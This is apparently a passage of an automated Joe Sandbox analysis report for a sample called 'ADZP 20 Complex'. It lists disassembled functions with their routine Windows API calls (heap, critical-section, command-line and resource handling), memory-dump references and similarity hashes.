                    Function 00405430 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004053E4: EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 004053EF
                      • Part of subcall function 004053E4: LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405422
                    • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405440
                    • EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040544C
                    • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040546C
                      • Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB
                    • LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405480
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                    • String ID:
                    • API String ID: 85618057-0
                    • Opcode ID: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
                    • Instruction ID: 2660d4446155f5fb089545407d2c8513ff3ad75f9eb032afb91e50ebd33cab77
                    • Opcode Fuzzy Hash: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
                    • Instruction Fuzzy Hash: 05F0E233404610FBC6205B619C49EE77779EF55767724883FF94172291CB386841CE6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004099C7 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
                    • GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
                    • DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
                    • CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CurrentHandleProcess$CloseDuplicate
                    • String ID:
                    • API String ID: 1410216518-0
                    • Opcode ID: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
                    • Instruction ID: ce6dac3176af70590056e0be6dcfbc27d6d18e8bdc9d520293d6dd9450c8e6f1
                    • Opcode Fuzzy Hash: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
                    • Instruction Fuzzy Hash: 73E0ED75608209BFEB10DF91DC49F9ABB7DEB44741F104065F905D2660EB71AD11CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402FAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E5BC
                      • Part of subcall function 00402E49: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402E71
                      • Part of subcall function 00402E49: __fprintf_l.LIBCMT ref: 00402ECB
                      • Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
                      • Part of subcall function 00409355: memset.MSVCRT ref: 00409381
                      • Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                      • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                      • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                      • Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
                      • Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
                      • Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
                      • Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
                      • Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                      • Part of subcall function 00403E37: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A0D,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403E67
                    • PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 00403178
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                    • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,020A8F10,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 004031DD
                      • Part of subcall function 00402C55: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402CF0
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
                    • String ID: $pA
                    • API String ID: 790731606-4007739358
                    • Opcode ID: 64ebd7b317967dc0aa4780699e57154d7a3f4f596edfabaaa6cc53898b52652e
                    • Instruction ID: e60bee266b2990c05e42038f4eaf1cd2a2725b994cf9f5ea8c77fc408b4d2e90
                    • Opcode Fuzzy Hash: 64ebd7b317967dc0aa4780699e57154d7a3f4f596edfabaaa6cc53898b52652e
                    • Instruction Fuzzy Hash: 6851E6B9601204BEE500BBB39D82D7F266DDBC471CB108C3FB440A50D3E93CAE65662E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040249D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                    Download Yara Rule
                    APIs
                    • GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040254F
                    • PathRemoveArgsW.SHLWAPI(?), ref: 00402585
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                      • Part of subcall function 004099A5: SetEnvironmentVariableW.KERNEL32(020A9F70,020A9F70,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                      • Part of subcall function 0040E5F0: RtlFreeHeap.NTDLL(020A0000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
                    • String ID: *pA
                    • API String ID: 1199808876-3833533140
                    • Opcode ID: dffdd5ba53270b8295326c032e0582dd1a13c4ab5ce676133e23ebaef934a0d5
                    • Instruction ID: beb9823a99ae011e4ed5f1d055ef6d1d692690281f772a57edd19b399da9bd76
                    • Opcode Fuzzy Hash: dffdd5ba53270b8295326c032e0582dd1a13c4ab5ce676133e23ebaef934a0d5
                    • Instruction Fuzzy Hash: E541E9B5504301BED600BBB39D8293F76A8EBC471CF508C3FB444A61D2EA3CD9655A2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040973A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040D968: TlsGetValue.KERNEL32(?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D96F
                      • Part of subcall function 0040D968: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D98A
                      • Part of subcall function 0040D968: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D999
                    • GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$AllocCommandHeapLine
                    • String ID: $"
                    • API String ID: 1339485270-3817095088
                    • Opcode ID: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
                    • Instruction ID: 229198f1d41a65a6e9ffff917a794aecd7294c87f6384db1244c7b0cd665179e
                    • Opcode Fuzzy Hash: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
                    • Instruction Fuzzy Hash: 3131A6735252218ADB64AF10981127772A1EFA2B60F18C17FE4926B3C2F37D4D41D369
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A638 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: _wcsicmpwcscmp
                    • String ID: $0A
                    • API String ID: 3419221977-513306843
                    • Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                    • Instruction ID: a9c09230f7291aa91694be4cadd9aa4df44d847ede942287367b49c05577748a
                    • Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                    • Instruction Fuzzy Hash: 39118F76508B018BD3209F56D440913B3F9EF94364329893FD88963790DB76EC658BAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405722
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405746
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide
                    • String ID: $0A
                    • API String ID: 626452242-513306843
                    • Opcode ID: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
                    • Instruction ID: 6633c5b8762e659e7e7445bcc2ebba2587ddb8769fcb30c67f307584ac15d0df
                    • Opcode Fuzzy Hash: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
                    • Instruction Fuzzy Hash: D4F0653A38632137E230215A6C06F57295DC785F71F3542367B247F3D0C5B1680046BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040DBFF Relevance: 5.1, APIs: 4, Instructions: 134memoryCOMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?), ref: 0040DC13
                    • HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?), ref: 0040DCC8
                    • HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000), ref: 0040DCEB
                    • LeaveCriticalSection.KERNEL32(?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?), ref: 0040DD43
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocCriticalHeapSection$EnterLeave
                    • String ID:
                    • API String ID: 830345296-0
                    • Opcode ID: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
                    • Instruction ID: 326a62a2d88e17b700e0b5dbbe6d23d3e5727d380a42910b8190cd6cec96877c
                    • Opcode Fuzzy Hash: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
                    • Instruction Fuzzy Hash: D151E570A04B069FD324CF69D980962B7F4FF587103148A3EE49A97A50D338F959CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E7D0 Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON
                    Download Yara Rule
                    APIs
                    • wcslen.MSVCRT ref: 0040E7E5
                    • HeapAlloc.KERNEL32(020A0000,00000000,0000000A), ref: 0040E809
                    • HeapReAlloc.KERNEL32(020A0000,00000000,00000000,0000000A), ref: 0040E82D
                    • HeapFree.KERNEL32(020A0000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E864
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$Alloc$Freewcslen
                    • String ID:
                    • API String ID: 2479713791-0
                    • Opcode ID: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
                    • Instruction ID: 61d70e0538fde6a9b2f408d2d23f17b2afdd03d3414029a6c312abdd158bf447
                    • Opcode Fuzzy Hash: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
                    • Instruction Fuzzy Hash: 6C2115B5604209EFCB04DF95D884FAAB7B9EB49354F10C169F8099B390D735EA81CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040DB18 Relevance: 5.1, APIs: 4, Instructions: 56memoryCOMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
                    • HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040DB63
                    • LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E
                      • Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocCriticalHeapSection$EnterLeave
                    • String ID:
                    • API String ID: 830345296-0
                    • Opcode ID: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
                    • Instruction ID: 234cd8b738bfcb23ec7c58dff1098e76d365aadfe99366d65fb7203dd4a6e8aa
                    • Opcode Fuzzy Hash: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
                    • Instruction Fuzzy Hash: 6A113D72504710AFC3208F68DC40D56BBFAEB48721B15892EE596E36A0CB34F844CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040DD5D Relevance: 5.0, APIs: 4, Instructions: 44memoryCOMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DD6F
                    • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DD86
                    • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DDA2
                    • LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DDBF
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalFreeHeapSection$EnterLeave
                    • String ID:
                    • API String ID: 1298188129-0
                    • Opcode ID: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
                    • Instruction ID: 339acd6113cd15283fdaf2d24efa5c6700350868ea18a16039eb98c455fe0077
                    • Opcode Fuzzy Hash: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
                    • Instruction Fuzzy Hash: 7C012C71A0161ABFC7108F96ED049A7FB78FF49751345817AA804A7664D734E824CFE8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A54F Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A79A: memset.MSVCRT ref: 0040A802
                      • Part of subcall function 0040DFC6: EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
                      • Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028
                      • Part of subcall function 0040DFC6: LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F
                    • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
                    • HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
                    • HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
                    • HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FreeHeap$CriticalSection$EnterLeavememset
                    • String ID:
                    • API String ID: 4254243056-0
                    • Opcode ID: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
                    • Instruction ID: 62ba4ec21453903b754b53d00370c9fddb20f7a3713721c865cfde946388869e
                    • Opcode Fuzzy Hash: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
                    • Instruction Fuzzy Hash: B5F04471105209BFC6125B16DD40C57BF7DFF49798342412AB40463570CB36ED75DBA8
                    Uniqueness

                    Uniqueness Score: -1.00%